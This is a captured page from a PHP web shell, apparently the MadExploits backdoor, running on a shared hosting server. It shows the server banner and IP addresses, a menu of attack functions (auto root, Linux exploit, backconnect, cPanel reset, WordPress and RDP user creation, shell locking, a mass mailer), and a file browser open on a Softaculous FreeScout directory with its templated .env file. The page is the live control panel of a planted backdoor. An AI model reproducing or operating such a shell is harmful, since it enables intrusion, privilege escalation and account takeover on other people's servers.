Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
freescout /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
922
B
-rw-r--r--
.installed
59
B
-rw-r--r--
clone.php
10.97
KB
-rw-r--r--
config.php
34.89
KB
-rw-r--r--
edit.php
4.28
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
10.06
KB
-rw-r--r--
fileindex.php
336
B
-rw-r--r--
freescout.sql
27.3
KB
-rw-r--r--
freescout.zip
10.36
MB
-rw-r--r--
import.php
3.13
KB
-rw-r--r--
info.xml
2.7
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.06
KB
-rw-r--r--
install.xml
1.95
KB
-rw-r--r--
md5
4.08
KB
-rw-r--r--
notes.txt
709
B
-rw-r--r--
update_pass.php
518
B
-rw-r--r--
upgrade.php
6.38
KB
-rw-r--r--
upgrade.xml
282
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env
# Every time you are making changes in .env file, in order changes to take an effect you need to run: # php artisan freescout:clear-cache # Application URL APP_URL=[[softurl]] # Improve security SESSION_SECURE_COOKIE=[[SESSION_SECURE_COOKIE]] # Timezones: https://github.com/freescout-helpdesk/freescout/wiki/PHP-Timezones # Comment it to use default timezone from php.ini APP_TIMEZONE=America/New_York # Default language APP_LOCALE=[[language]] # Database settings DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" # Run the following console command to generate the key: php artisan key:generate # Otherwise application will show the following error: "Whoops, looks like something went wrong" APP_KEY=[[APP_KEY]] # Uncomment to see errors in your browser, don't forget to comment it back when debugging finished #APP_DEBUG=true
Close